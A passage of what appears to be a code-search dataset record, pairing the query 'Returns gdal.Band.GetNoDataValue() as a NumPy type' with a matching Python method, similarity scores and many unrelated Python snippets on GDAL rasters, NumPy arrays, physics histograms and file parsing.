fid.readline()\n l_input = re.split('[!\\s]',line)\n chi = float(l_input[0])\n\n # Line 10\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n val = 
np.array(l_input[0:4])\n alphas = val.astype(np.float)\n\n # Line 11\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n val = np.array(l_input[1:3])\n bounds = val.astype(np.float)\n\n else:\n bounds = l_input[0].rstrip()\n\n # Line 12\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n val = np.array(l_input[1:6])\n lpnorms = val.astype(np.float)\n\n else:\n lpnorms = l_input[0].rstrip()\n\n # Line 13\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n val = np.array(l_input[1:3])\n eps = val.astype(np.float)\n\n else:\n eps = [None,None]\n\n self.mshfile = mshfile\n self.obsfile = obsfile\n self.topofile = topofile\n self.mstart = mstart\n self._mrefInput = mref\n self._staticInput = staticInput\n self.magfile = magfile\n self.wgtfile = wgtfile\n self.chi = chi\n self.alphas = alphas\n self.bounds = bounds\n self.lpnorms = lpnorms\n self.eps = eps", "def create_verde_rules_lp(schema_file, input_file, mapping_file,\n query_fields, trial_id, directory, rule_config, baseline_lp,\n verde_rule_template_dir):\n\n logging.info(f'creating verde rules lp based on {schema_file} and {mapping_file}')\n\n context = Dict()\n context.id = trial_id\n context.directory = directory\n context.rule_config = rule_config\n context.verde_rule_template_dir = verde_rule_template_dir\n\n # Load the input mapping json\n with open(mapping_file) as f:\n mapping_json = json.load(f)\n\n lp_str = \"\"\n # Apply each verde rule to extend the lp\n if rule_config.rule_01_causal_relationships.do:\n lp_str += vrule01.rule_01_causal_relationships(context, schema_file, mapping_json, query_fields)\n else:\n logging.warning('verde rule_01_causal_relationships is disabled in config')\n\n if rule_config.rule_02_data_precision.do:\n lp_str += vrule02.rule_02_data_precision(context, mapping_json, query_fields)\n else:\n logging.warning('verde rule_02_data_precision is disabled in config')\n\n if rule_config.rule_03_ordinal_sort.do:\n lp_str += vrule03.rule_03_ordinal_sort(context, schema_file, input_file, mapping_json, query_fields)\n else:\n logging.warning('verde rule_03_ordinal_sort is disabled in config')\n\n if rule_config.rule_04_entity_colours.do:\n lp_str += vrule04.rule_04_colour(context, schema_file, mapping_json)\n else:\n logging.warning('verde rule_04_entity_colours is disabled in config')\n\n lp = lp_str.split('\\n') # bit messy, we used lists elsewhere then moved to jinja templates\n\n # Write out the partial lp containing the data schema and our verde soft rules\n if rule_config.write_lp:\n lp_file = os.path.join(directory, f'{context.id}_verde_schema_query.lp')\n vutils.write_list_to_file(baseline_lp + lp, lp_file, 'verde full schema and query lp')\n\n return baseline_lp + lp", "def create_true_vectors(filename, reference_file):\n\n all_cases = np.array([], dtype=np.int64).reshape(0, cs.NN_VECTOR_LENGTH)\n alignment_file = open(filename, 'r')\n\n for line in alignment_file:\n line = line.split('\\t')\n if len(line) >= 9:\n vector_nn = np.array(reference_to_signal_partial_mapping(line[9], reference_file, line[0][3:], line[1],\n int(line[2]), int(line[4])))\n all_cases = np.append(all_cases, vector_nn, axis=0)\n if len(all_cases) > cs.NUMBER_OF_EXAMPLES:\n break\n\n return all_cases", "def produce_13TeV_template(tag_name=\"HKHI\"):\n num_rebin = 1\n file_name = \"inputs/BkgEstimation_Lin/BkgEstimation_NONE_TOPO_PTDEP_\"+tag_name+\"_Lin.root\"\n print \"Input: \", file_name\n fin = ROOT.TFile.Open(file_name, 
\"read\")\n h_nom = fin.Get(\"bkg_total_gg_full\").Clone(\"bkg_nominal_old\")\n h_nom.Rebin(num_rebin)\n fout = ROOT.TFile.Open(\"hists_input_\"+tag_name+\".root\", \"recreate\")\n\n h_purity_sys = fin.Get(\"bkg_purity_syst_gg_full\").Clone(\"bkg_purity_syst_gg\")\n h_reducible_sys = fin.Get(\"bkg_reducible_syst_gg_full\").Clone(\"bkg_reducible_syst_gg\")\n h_irreducible_sys = fin.Get(\"bkg_irreducible_syst_gg_full\").Clone(\"bkg_irreducible_syst_gg\")\n h_iso_sys = fin.Get(\"bkg_iso_syst_gg_full\").Clone(\"bkg_iso_syst_gg\")\n\n #file_iso = \"isolation_sys/hist.root\"\n #fin2 = ROOT.TFile.Open(file_iso, \"read\")\n #h_iso_sys = fin2.Get(\"bkg_isolation_syst_gg\")\n ## inflat irreducible uncertainty by factor of 10\n # so that it closes to stats uncertainty in data\n sf = 1\n if INFLATE_SYS:\n sf = 10\n\n # after rebinning systematic uncertainties, need to scale down,\n # otherwise the uncertainties are inflated.\n h_purity_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_irreducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_reducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_iso_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n\n ## truncate the histograms to [200, 2000] GeV\n h_nom_new = truncate_hist(h_nom, \"bkg_nominal\")\n h_purity_sys_new = truncate_hist(h_purity_sys, \"h_purity_sys_new\")\n h_irreducible_sys_new = truncate_hist(h_irreducible_sys, \"h_irreducible_sys_new\")\n h_reducible_sys_new = truncate_hist(h_reducible_sys, \"h_reducible_sys_new\")\n h_iso_sys_new = truncate_hist(h_iso_sys, \"h_iso_sys_new\")\n\n #write down sys and nominal\n fout.cd()\n h_nom_new.Write()\n h_purity_sys_new.Write()\n h_reducible_sys_new.Write()\n h_irreducible_sys_new.Write()\n h_iso_sys_new.Write()\n\n h_purity_up, h_purity_down = create_sys_hist(h_nom_new, h_purity_sys_new, \"purity_sys\")\n h_purity_up.Write()\n h_purity_down.Write()\n\n h_red_up, h_red_down = create_sys_hist(h_nom_new, h_reducible_sys_new, \"reducible_sys\")\n h_red_up.Write()\n h_red_down.Write()\n\n h_irred_up, h_irred_down = create_sys_hist(h_nom_new, h_irreducible_sys_new, \"irreducible_sys\")\n h_irred_up.Write()\n h_irred_down.Write()\n\n h_iso_up, h_iso_down = create_sys_hist(h_nom_new, h_iso_sys, \"isolation_sys\")\n h_iso_up.Write()\n h_iso_down.Write()\n\n fin.Close()\n fout.Close()", "def process_svgs(model_info, directory, output, allow_missing=False):\n r2dt.write(model_info, directory, output, allow_missing=allow_missing)" ]
[ "0.6332105", "0.6148278", "0.60546756", "0.6035137", "0.59595346", "0.58744794", "0.58276", "0.58268255", "0.57943213", "0.57037807", "0.56656307", "0.5467358", "0.541127", "0.5396852", "0.53866345", "0.53866345", "0.53640836", "0.5348823", "0.52539855", "0.5224854", "0.51994747", "0.5192403", "0.51900554", "0.5165529", "0.5159512", "0.515376", "0.5151332", "0.51434046", "0.5141987", "0.5133459", "0.5118285", "0.5111108", "0.50902104", "0.50852007", "0.50811803", "0.5078187", "0.5068416", "0.5063147", "0.50577945", "0.50099593", "0.50085336", "0.5002134", "0.4996009", "0.49745375", "0.49737355", "0.49719802", "0.49691865", "0.4965909", "0.49294093", "0.49206844", "0.49177408", "0.49156937", "0.49134704", "0.49087375", "0.4901378", "0.48920193", "0.48857296", "0.4869468", "0.4869468", "0.48694164", "0.4854838", "0.484103", "0.48405656", "0.48332667", "0.48232844", "0.4822603", "0.4820913", "0.48203066", "0.4819152", "0.48039868", "0.47993007", "0.47940227", "0.47916836", "0.4788897", "0.47862664", "0.47828332", "0.47616982", "0.47546104", "0.47536212", "0.4749284", "0.474661", "0.47417504", "0.47408664", "0.47398564", "0.47284323", "0.4727966", "0.47255188", "0.47156096", "0.47144514", "0.47106367", "0.4708809", "0.47057223", "0.47050765", "0.47025943", "0.47021836", "0.47015566", "0.46951467", "0.4694794", "0.46844468", "0.46841887" ]
0.6055037
2
Returns gdal.Band.GetNoDataValue() as a NumPy type
def GetNoDataValue(self):
    result = super(Band, self).GetNoDataValue()
    if result is not None:
        return self.NumPyDataType(result)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_band_nodata(self, band_idx=1):\n if band_idx < 1 or band_idx > self.dataset.RasterCount:\n raise IndexError(\"band index is out of range\")\n return self.dataset.GetRasterBand(band_idx).GetNoDataValue()", "def _nodata_value(self):\n try:\n nodata = float(self._info[\"bands\"][0][\"noDataValue\"])\n except KeyError:\n nodata = None\n return nodata", "def get_raster_nodata(self):\n\n nodata = list()\n for i in range(0, self.dataset.RasterCount):\n nodata.append(self.dataset.GetRasterBand(i + 1).GetNoDataValue())\n\n return nodata if len(nodata) >= 0 and not all(\n d is None for d in nodata) else None", "def sentinel_to_numpy(ds: xr.Dataset) -> np.ndarray:\n array = ds.transpose(\"lat\", \"lon\", \"band\").to_array().values\n\n return np.squeeze(array, 0)", "def data_missing():\n return RaggedArray([[], [-1, 0, 1]], dtype='int16')", "def read_raster (self, filename):\n raster = gdal.Open (filename)\n band = raster.GetRasterBand(1)\n x = band.ReadAsArray () \n nodata_val = band.GetNoDataValue () # get the missing data flag\n x [x == nodata_val] = np.nan # set missing data properly\n return (x)", "def setup_no_data_values(input_dataset, options):\n in_nodata = []\n if options.srcnodata:\n nds = list(map(float, options.srcnodata.split(',')))\n if len(nds) < input_dataset.RasterCount:\n in_nodata = (nds * input_dataset.RasterCount)[:input_dataset.RasterCount]\n else:\n in_nodata = nds\n else:\n for i in range(1, input_dataset.RasterCount+1):\n raster_no_data = input_dataset.GetRasterBand(i).GetNoDataValue()\n if raster_no_data is not None:\n in_nodata.append(raster_no_data)\n\n if options.verbose:\n print(\"NODATA: %s\" % in_nodata)\n\n return in_nodata", "def getNoData(self):\n #---+----|----+----|----+----|----+----|----+----|----+----|----+----|\n return TreeLikelihoodBase.getNoData(self)", "def test_nodata(self):\n\n \n filename = 'data/test_grid.asc'\n R = read_coverage(filename)\n \n nan = R.get_nodata_value()\n assert nan == -9999\n \n A = R.get_data(nan=False)\n assert numpy.min(A[:]) == -9999\n assert numpy.allclose(numpy.max(A[:]), 50.9879837036) \n \n A = R.get_data(nan=True)\n assert numpy.allclose(numpy.nanmin(A[:]), -50.60135540866)\n assert numpy.allclose(numpy.nanmax(A[:]), 50.9879837036)", "def isna(self):\n # type: () -> np.ndarray\n return extract_isnull_bytemap(self.data)", "def isna(self):\n # type: () -> np.ndarray\n return extract_isnull_bytemap(self.data)", "def test_scalar_null(self):\n dset = self.f.create_dataset('x', shape=(), dtype='i1')\n out = dset[()]\n self.assertIsInstance(out, np.int8)", "def unmasked_data(self):\n return numpy.ma.filled(self.data.astype(numpy.float_),\n fill_value=numpy.nan)", "def astype(self, dtype):\n return NoneArray", "def getBinnedData(self):\n return self._array.sum(0)", "def test_single_null(self):\n dset = self.f.create_dataset('x', (1,), dtype='i1')\n out = dset[()]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, (1,))", "def read_gdal_values(dataset=None, nodata=None):\n nbands = dataset.RasterCount\n\n # data values\n bands = []\n for i in range(nbands):\n band = dataset.GetRasterBand(i + 1)\n nd = band.GetNoDataValue()\n data = band.ReadAsArray()\n if nodata is not None:\n data[data == nd] = nodata\n bands.append(data)\n\n return np.squeeze(np.array(bands))", "def none(self, type_name):\n provenance = NQExprProvenance(operation='none', args=(type_name, None))\n np_vec = self.zeros_numpy_array(type_name, as_matrix=True)\n return self.as_nql(np_vec, type_name, provenance)", "def nonans(array):\n 
return array[~np.isnan(array)]", "def test_raster_integer_nan_value():\n cvs = ds.Canvas(plot_height=2, plot_width=2, x_range=(0, 1), y_range=(0,1))\n array = np.array([[9999, 1, 2, 3], [4, 9999, 6, 7], [8, 9, 9999, 11]])\n coords = {'x': np.linspace(0, 1, 4), 'y': np.linspace(0, 1, 3)}\n xr_array = xr.DataArray(array, coords=coords, dims=['y', 'x'])\n\n agg = cvs.raster(xr_array, downsample_method='max', nan_value=9999)\n expected = np.array([[4, 7], [9, 11]])\n\n assert np.allclose(agg.data, expected)\n assert agg.data.dtype.kind == 'i'\n assert np.allclose(agg.x.values, np.array([0.25, 0.75]))\n assert np.allclose(agg.y.values, np.array([0.25, 0.75]))", "def noSpecificValues(self):\n return self.__noSpecificValues(self.__result)", "def mask_nodata(self):\n ds_out = self._obj\n for var in self.vars:\n ds_out[var] = ds_out[var].raster.mask_nodata()\n return ds_out", "def zero_to_nodata(base_raster):\n target_raster = base_raster.copy()\n target_raster[target_raster == 0] = _IC_NODATA\n return target_raster", "def get_nonzeros(self):\n return self.tape.get_nonzeros(self.machine.eval_symbol,\n self.machine.eval_state(self.state))", "def test_qf_dataarray_dtype_for_nan_volume(self):\n tickers = [BloombergTicker(\"FMIM10 Index\")]\n start_date = str_to_date(\"2010-01-14\")\n end_date = str_to_date(\"2010-01-19\")\n\n data_array = self.bbg_provider.get_price(tickers, [PriceField.Close, PriceField.Volume], start_date, end_date,\n Frequency.DAILY)\n self.assertEqual(data_array.dtype, np.float64)", "def dropna(self) -> \"Dataset\":\n if not self[0]._has_time_axis: # type: ignore\n raise ValueError(\"Not available if no time axis!\")\n\n all_index: List[int] = []\n for i in range(self.n_items):\n x = self[i].to_numpy()\n\n # this seems overly complicated...\n axes = tuple(range(1, x.ndim))\n idx = list(np.where(~np.isnan(x).all(axis=axes))[0])\n if i == 0:\n all_index = idx\n else:\n all_index = list(np.intersect1d(all_index, idx))\n\n return self.isel(all_index, axis=0)", "def test_raster_float_nan_value():\n cvs = ds.Canvas(plot_height=2, plot_width=2, x_range=(0, 1), y_range=(0,1))\n array = np.array([[np.NaN, 1., 2., 3.], [4., np.NaN, 6., 7.], [8., 9., np.NaN, 11.]])\n coords = {'x': np.linspace(0, 1, 4), 'y': np.linspace(0, 1, 3)}\n xr_array = xr.DataArray(array, coords=coords, dims=['y', 'x'])\n\n agg = cvs.raster(xr_array, downsample_method='max')\n expected = np.array([[4, 7], [9, 11]])\n\n assert np.allclose(agg.data, expected)\n assert agg.data.dtype.kind == 'f'\n assert np.allclose(agg.x.values, np.array([0.25, 0.75]))\n assert np.allclose(agg.y.values, np.array([0.25, 0.75]))", "def test_nodata_value(self):\n\n # Read files with -9999 as nominated nodata value\n for filename in [os.path.join(TESTDATA, 'Population_2010_clip.tif'),\n os.path.join(HAZDATA,\n 'Lembang_Earthquake_Scenario.asc')]:\n\n R = read_layer(filename)\n A = R.get_data(nan=False)\n\n # Verify nodata value\n Amin = min(A.flat[:])\n msg = ('Raster must have -9999 as its minimum for this test. '\n 'We got %f for file %s' % (Amin, filename))\n assert Amin == -9999, msg\n\n # Verify that GDAL knows about this\n nodata = R.get_nodata_value()\n msg = ('File %s should have registered nodata '\n 'value %i but it was %s' % (filename, Amin, nodata))\n assert nodata == Amin, msg\n\n # Then try using numpy.nan\n A = R.get_data(nan=True)\n\n # Verify nodata value\n Amin = numpy.nanmin(A.flat[:])\n msg = ('True raster minimum must exceed -9999. 
'\n 'We got %f for file %s' % (Amin, filename))\n assert Amin > -9999, msg\n\n # Then try with a number\n A = R.get_data(nan=-100000)\n\n # Verify nodata value\n Amin = numpy.nanmin(A.flat[:])\n msg = ('Raster must have -100000 as its minimum for this test. '\n 'We got %f for file %s' % (Amin, filename))\n assert Amin == -100000, msg\n\n # Try with illegal nan values\n for illegal in [{}, (), [], None, 'a', 'oeuu']:\n try:\n R.get_data(nan=illegal)\n except InaSAFEError:\n pass\n else:\n msg = ('Illegal nan value %s should have raised '\n 'exception' % illegal)\n raise RuntimeError(msg)", "def raster_to_numpy_array(raster_data, as_single_band=True,\n old_nodata=None, new_nodata=None):\n bands = as_single_band + (1 - as_single_band) * raster_data.RasterCount\n nrow = raster_data.RasterYSize\n ncol = raster_data.RasterXSize\n dims = (bands, nrow, ncol)\n\n out_data_array = np.full(dims, np.nan)\n\n for i in range(bands):\n srcband = raster_data.GetRasterBand(i + 1)\n srcband_array = np.array(srcband.ReadAsArray().astype(np.float))\n if old_nodata is None:\n old_nodata = srcband.GetNoDataValue()\n if new_nodata is not None and old_nodata is not None:\n if np.isnan(old_nodata):\n srcband_array[np.isnan(srcband_array)] = new_nodata\n else:\n srcband_array[srcband_array == old_nodata] = new_nodata\n print('NoData: Replaced ' + str(old_nodata) +\n ' with ' + str(new_nodata))\n out_data_array[i, :, :] = srcband_array\n\n if as_single_band:\n return out_data_array[0, :, :]\n else:\n return out_data_array", "def isnan(data):\n return _make.isnan(data)", "def var_data_unc(self, index):\n data = np.ma.array(np.zeros(self.n_levels()), mask=True)\n if index is not None:\n for i in range(self.n_levels()):\n if self.profile_data[i]['variables'][index]['Missing'] or self.profile_data[i]['variables'][index]['Missing_unc']: continue\n data[i] = self.profile_data[i]['variables'][index]['Value_unc']\n return data", "def __array__(self):\n return pa.column(\"dummy\", self.data).to_pandas().values", "def getNoLabel(self):\n # TODO: this is a quick hack. We need another way to signify \"the empty label\"\n (itemtype, interval) = self.getLabelTypeAndInterval()\n return pynt.rangeset.RangeSet(None, itemtype=itemtype, interval=interval)", "def getNoLabel(self):\n # TODO: this is a quick hack. We need another way to signify \"the empty label\"\n (itemtype, interval) = self.getLabelTypeAndInterval()\n return pynt.rangeset.RangeSet(None, itemtype=itemtype, interval=interval)", "def data_missing() -> ExtensionArray:\n data_matrix = np.arange(\n 2 * 10 * 10 * 3,\n dtype=np.float_,\n ).reshape(2, 10, 10, 3)\n data_matrix[0, ...] 
= np.NaN\n grid_points = [\n np.arange(10),\n np.arange(10) / 10,\n ]\n\n return skfda.FDataGrid(data_matrix, grid_points=grid_points)", "def data_missing(basis: Basis) -> FDataBasis:\n coef_matrix = np.arange(\n 2 * basis.n_basis,\n dtype=np.float_,\n ).reshape(2, basis.n_basis)\n coef_matrix[0, :] = np.NaN\n\n return FDataBasis(basis=basis, coefficients=coef_matrix)", "def test_scalar_null(setup_teardown_file):\n f = setup_teardown_file[3]\n\n dset = f.create_dataset('x', shape=(), dtype='i1')\n out = dset[()]\n\n assert out.dtype == \"int8\"", "def data_missing_for_sorting(allow_in_pandas):\n return PandasArray(\n np.array([(1,), np.nan, (0,)])\n )", "def nonull(val):\n return val if not pd.isnull(val) else None", "def _nodata_mask(self):\n if self.nodata_value is None:\n return np.ones_like(self.array, dtype=np.bool)\n return self.array != self.nodata_value", "def getMask(self):\r\n mask = np.array(self.array, dtype=np.float32)\r\n mask[mask == 0] = np.nan\r\n return mask", "def band_count(self):\n return self.dataset.RasterCount if self.dataset else None", "def _pure_data(data, missing_mask):\n missing_rows = np.where(missing_mask)[0]\n pure_data = np.delete(data, missing_rows, axis=0)\n\n return pure_data", "def getNarrowbandIncandSignalLG(self):\r\n\t\treturn self.lowGainNarrowBandIncandData", "def nan_value(data):\n return data.isnull().any()", "def isnan(self):\n return self.isAny( (lambda x: np.isnan(x)) )", "def no_bin(image, *args, **kwargs):\n return image", "def remove_zero_bars(dgm):\r\n inds = dgm[:,0] != dgm[:,1]\r\n return dgm[inds,:]", "def get_missing(self):\n missing_values = self.df[self.col_name].isnull().sum()\n return missing_values", "def notna(self):\n return DataFrameDefault.register(pandas.DataFrame.notna)(self)", "def _get_missing_h5lmt(self, dataset_name, inverse=False):\n dataset = self.__getitem__(dataset_name)\n missing_dataset = self.get('/FSMissingGroup/FSMissingDataSet')\n if len(dataset.shape) == 1:\n result = numpy.zeros((dataset.shape[0], 1), dtype=numpy.int8)\n elif dataset.shape == missing_dataset.shape:\n result = missing_dataset[:, :].astype('i8').T\n else:\n result = numpy.zeros(dataset[:, :].shape, dtype=numpy.int8).T\n\n if inverse:\n return (~result.astype(bool)).astype('i8')\n return result", "def type(self):\n # type: () -> type\n return _python_type_map[str(self.xnd_dtype.hidden_dtype)]", "def no_reg(w):\n return np.zeros_like(w)", "def extract_unmasked_data(self,radar, field, bad=-32768):\n return radar.fields[field]['data'].filled(fill_value=bad)", "def mask(self, mask, logger=logger):\n if self.nodata is not None:\n da_masked = self._obj.where(mask != 0, self.nodata)\n else:\n logger.warning(\"Nodata value missing, skipping mask\")\n da_masked = self._obj\n return da_masked", "def extract_unmasked_data(radar, field, bad=-32768):\n return radar.fields[field]['data'].filled(fill_value=bad)", "def data_missing(data):\n return type(data)._from_sequence([None, data[0]])", "def getNarrowbandIncandSignal(self):\r\n\t\treturn self.narrowBandIncandData", "def test_single_null(setup_teardown_file):\n f = setup_teardown_file[3]\n\n dset = f.create_dataset('x', (1,), dtype='i1')\n out = dset[()]\n assert isinstance(out, np.ndarray)\n assert out.shape == (1,)", "def missing_values(dataset, inverse=False):\n zero = numpy.int8(0)\n one = numpy.int8(1)\n if inverse:\n converter = numpy.vectorize(lambda x:\n zero if (x == 0.0 and math.copysign(1, x) < 0.0) else one)\n else:\n converter = numpy.vectorize(lambda x:\n one if (x == 0.0 and math.copysign(1, 
x) < 0.0) else zero)\n return converter(dataset)", "def getNotHidden(self):\n return self.abudance_df[self.abundance_df['masked']==False]", "def GetOutputNarrowBand(self) -> \"itkVectorContainerUILSNF3_Pointer\":\n return _itkReinitializeLevelSetImageFilterPython.itkReinitializeLevelSetImageFilterIF3_GetOutputNarrowBand(self)", "def test_default_signal_nxdata(self, nexus_base):\n assert isinstance(nexus_base.default_signal, np.ndarray)", "def trend_none(self):\n raise NotImplementedError()", "def nan(klass):\n return RatTerm(RatNum(1, 0), 0)", "def __array__(self, dtype=None) -> np.ndarray:\n return self.values", "def nocoordinate(self):\n return self.__nocoordinate", "def non_gpu_data(self):\n\n return self._non_gpu_data", "def zero(self):\n q = pinocchio.neutral(self.model)\n v = np.zeros(self.model.nv)\n return np.concatenate([q.flat, v])", "def AB_zero_flux(self):\n return self._get_mean_and_samples_attribute('AB_zero_flux')", "def __array__(self, copy=None):\n return self.data.to_pandas().values", "def build_signal_dataset(self):\n return np.abs(self.bandpassed).mean(axis=-2)", "def GetOutputNarrowBand(self) -> \"itkVectorContainerUILSNF2_Pointer\":\n return _itkReinitializeLevelSetImageFilterPython.itkReinitializeLevelSetImageFilterIF2_GetOutputNarrowBand(self)", "def null(cls):\n return GXMXD()", "def usedbands(self):\n lc = self.lc\n return np.unique(np.asarray(lc['band']))", "def nid(x):\n return x.__array_interface__['data'][0]", "def _strip_nan(val):\n if isinstance(val, float) and np.isnan(val):\n return '__NaN__'\n elif isinstance(val, dict):\n return {key: Database._strip_nan(item) for key, item in list(val.items())}\n elif isinstance(val, list) or isinstance(val, tuple):\n return [Database._strip_nan(item) for item in val]\n elif isinstance(val, set):\n raise NotImplementedError\n return val", "def test_raster_integer_nan_value_padding():\n\n cvs = ds.Canvas(plot_height=3, plot_width=3, x_range=(0, 2), y_range=(0, 2))\n array = np.array([[9999, 1, 2, 3], [4, 9999, 6, 7], [8, 9, 9999, 11]])\n xr_array = xr.DataArray(array, coords={'x': np.linspace(0, 1, 4), 'y': np.linspace(0, 1, 3)}, dims=['y', 'x'])\n\n agg = cvs.raster(xr_array, downsample_method='max', nan_value=9999)\n expected = np.array([[4, 7, 9999], [9, 11, 9999], [9999, 9999, 9999]])\n\n assert np.allclose(agg.data, expected)\n assert agg.data.dtype.kind == 'i'\n assert np.allclose(agg.x.values, np.array([1/3., 1.0, 5/3.]))\n assert np.allclose(agg.y.values, np.array([1/3., 1.0, 5/3.]))", "def na_value():\n return pd.NA", "def nz(self):\n return self._dim[2]", "def remove_nan(self, dataframe):\n return dataframe.dropna()", "def ng(nanograms):\n return Unit(nanograms,\"nanogram\")", "def zero(self):\n if self._chart.manifold().base_field_type() in ['real', 'complex']:\n elt = SR.zero()\n else:\n elt = self._chart.manifold().base_field().zero()\n return self.element_class(self, elt)", "def remove_data(ds, nh_lim, sh_lim, time_max, lat_name='lat', time_name='time'):\n return xr.where((ds[lat_name] < nh_lim) &\n (ds[lat_name] > sh_lim) &\n (ds[time_name] < pd.to_datetime([time_max]).values),\n np.nan,\n ds)", "def df_nodal_flux(self):\n df_q = pd.DataFrame(index=self.masking_domain)\n df_q[\"q\"] = self.sdb.getNodalValues()\n df_q.dropna(subset=[\"q\"], inplace=True)\n return df_q.join(self.doc.c.mesh.df.nodes())", "def Vega_zero_flux(self):\n return self._get_mean_and_samples_attribute('Vega_zero_flux')", "def soleDataPoint(self):\n dps = self.datapoints()\n if dps:\n return dps[0]", "def tonumpy(self):\n import 
numpy\n from numpy import ma\n\n # initialize the return\n narray = None\n\n if None in self._data:\n\n # define a lambda function\n # to create the mask array\n make_mask = lambda x: x == None\n\n # create the numpy array,\n # making on the fly the mask\n narray = numpy.ma.array(self._data, mask=list(map(make_mask, self._data)))\n\n else:\n # convert the list to a numpy object\n narray = numpy.array(self._data)\n\n # return the numpy object\n return narray", "def get_tif(self, file='', band=1):\n Data = np.ndarray\n\n if band == '':\n band = 1\n\n f = gdal.Open(file)\n if f is not None:\n try:\n Data = f.GetRasterBand(band).ReadAsArray()\n except AttributeError:\n raise AttributeError('Band {band} not found.'.format(band=band))\n else:\n raise IOError('{} not found.'.format(file))\n\n return Data", "def getUndefinedDataAt(self, address: ghidra.program.model.address.Address) -> ghidra.program.model.listing.Data:\n ...", "def filter_nans(seq):\n return np.array([x for x in seq if not isinstance(x, float)])", "def oiDataIsNull(self):\n self.charts_1.getGV().hide()\n self.charts_2.getGV().hide()", "def replace_value(cls, data, nodata):\n data = data.astype('float64')\n mask = data != nodata\n if hasattr(data, 'where'):\n return data.where(mask, np.NaN)\n return np.where(mask, data, np.NaN)", "def readImage(self, imgfile, band):\n imgds = gdal.Open(imgfile, gdal.GA_ReadOnly)\n imgband = imgds.GetRasterBand(band)\n imgdata = imgband.ReadAsArray(0, 0, imgband.XSize, imgband.YSize)\n imgds = None\n return imgdata", "def unsetValue(self):\n return _libsbml.FluxBound_unsetValue(self)", "def missing_data(self, by='marker'):\n d = np.copy(self.geno).astype(float)\n d[d == -9] = np.nan\n if by == 'marker' or by == 0:\n return np.isnan(d[:,:,0]).mean(0)\n elif by == 'individual' or by == 1:\n return np.isnan(d[:,:,0]).mean(1)\n else:\n raise ValueError(\"`by` should be either 'marker' or 'individual'.\")", "def gdx_isnan(val,gdxf):\n return val in [SPECIAL_VALUES[0], SPECIAL_VALUES[1]]", "def get_bin_band_arr(self):\n\n fn = self._lib['cwtObj_getBinBandArr']\n fn.argtypes = [POINTER(OpaqueCWT)]\n fn.restype = c_void_p\n p = fn(self._obj)\n ret = np.frombuffer((c_int * self.num).from_address(p), np.int32).copy()\n return ret", "def notna(self):\n return super().notna()", "def getNZ(self):\n return self._get_nz( )" ]
[ "0.7544999", "0.7434405", "0.7288697", "0.6567842", "0.6520311", "0.6363698", "0.6319562", "0.62501335", "0.6163293", "0.61502856", "0.61502856", "0.61240387", "0.6110622", "0.60905856", "0.590359", "0.5895869", "0.58876556", "0.58424926", "0.58220965", "0.5796688", "0.5778561", "0.57269347", "0.5697276", "0.5692186", "0.5664606", "0.5648056", "0.5614599", "0.558892", "0.5553388", "0.5547773", "0.55438596", "0.55414027", "0.5538868", "0.5538868", "0.55292845", "0.5524298", "0.5514468", "0.551139", "0.5499059", "0.54568845", "0.54413116", "0.54289687", "0.5420883", "0.5406187", "0.5395783", "0.53955954", "0.5383611", "0.5383192", "0.5375553", "0.53724414", "0.53643703", "0.53610915", "0.53538567", "0.53507227", "0.53458756", "0.5337329", "0.53130645", "0.530204", "0.52835155", "0.5281505", "0.5280815", "0.5277185", "0.52676123", "0.5258759", "0.5258387", "0.5254711", "0.52536994", "0.52447087", "0.5226507", "0.5226414", "0.5220528", "0.52157587", "0.5213573", "0.52073765", "0.52072257", "0.52064055", "0.52026284", "0.519964", "0.5196084", "0.51917446", "0.518738", "0.51872295", "0.51862764", "0.51839083", "0.517904", "0.51716214", "0.5161016", "0.5160043", "0.515909", "0.5158713", "0.51535845", "0.5150214", "0.5147213", "0.51391715", "0.51378745", "0.51344496", "0.51323783", "0.5130883", "0.5112671", "0.5100205" ]
0.86186093
0
Returns the NumPy type associated with gdal.Band.DataType
def NumPyDataType(self):
    datatype = self.DataType
    if datatype == gdalconst.GDT_Byte:
        pixeltype = self.GetMetadataItem('PIXELTYPE', 'IMAGE_STRUCTURE')
        if pixeltype == 'SIGNEDBYTE':
            return numpy.int8
        return numpy.uint8
    elif datatype == gdalconst.GDT_UInt16:
        return numpy.uint16
    elif datatype == gdalconst.GDT_UInt32:
        return numpy.uint32
    elif datatype == gdalconst.GDT_Int16:
        return numpy.int16
    elif datatype == gdalconst.GDT_Int32:
        return numpy.int32
    elif datatype == gdalconst.GDT_Float32:
        return numpy.float32
    elif datatype == gdalconst.GDT_Float64:
        return numpy.float64
    else:
        raise ValueError(
            "Cannot handle DataType: {0}".format(
                gdal.GetDataTypeName(datatype)
            )
        )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_band_dtype(self, band_idx=1):\n if band_idx < 1 or band_idx > self.dataset.RasterCount:\n raise IndexError(\"band index is out of range\")\n return self.dataset.GetRasterBand(band_idx).DataType", "def type(self):\n # type: () -> type\n return _python_type_map[str(self.xnd_dtype.hidden_dtype)]", "def GetDataType(self):\n return _gmat_py.ElementWrapper_GetDataType(self)", "def get_data_type(self, idx):\n return(self.data[idx].dtype)", "def dtype(self):\n return self.dataset.dtype", "def dtype(self):\n return self._vars[0].dtype", "def _numpy_datatype_from_nd4j_context():\n nd4j_datatype = data_type()\n if nd4j_datatype == 'double':\n return np.float64\n elif nd4j_datatype == 'float':\n return np.float32\n elif nd4j_datatype == 'half':\n return np.float16", "def get_gdal_datatype(in_datatype):\n if in_datatype == 'float64':\n return gdalconst.GDT_Float64\n elif in_datatype == 'float32':\n return gdalconst.GDT_Float32\n elif in_datatype == 'int32':\n return gdalconst.GDT_Int32\n else:\n raise ValueError(\n 'Unrecognized data type in get_gdal_datatype():\\n {}'.format(\n in_datatype))", "def getDataType(self, label):\n\n try:\n return self._data[label].dtype\n except KeyError:\n return None", "def GetNoDataValue(self):\n result = super(Band, self).GetNoDataValue()\n if result is not None:\n return self.NumPyDataType(result)", "def 